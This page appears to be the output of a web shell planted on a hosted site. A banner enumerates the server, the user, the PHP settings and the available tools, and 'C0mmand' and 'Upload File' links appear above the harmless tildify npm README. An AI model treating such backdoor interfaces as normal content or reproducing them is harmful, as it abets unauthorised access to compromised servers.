|
Server IP : 10.107.20.4 / Your IP : 216.73.217.92 Web Server : Apache System : Linux webm004.cluster107.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : simfexinjt ( 803937) PHP Version : 7.1.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/simfexinjt/../s/../simfexinjt/www/node_modules/gulp/node_modules/.bin/../tildify/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
# tildify [](https://travis-ci.org/sindresorhus/tildify)
> Convert an absolute path to a tilde path: `/Users/sindresorhus/dev` → `~/dev`
## Install
```
$ npm install --save tildify
```
## Usage
```js
const tildify = require('tildify');
tildify('/Users/sindresorhus/dev');
//=> '~/dev'
```
## Related
See [untildify](https://github.com/sindresorhus/untildify) for the inverse.
## License
MIT © [Sindre Sorhus](https://sindresorhus.com)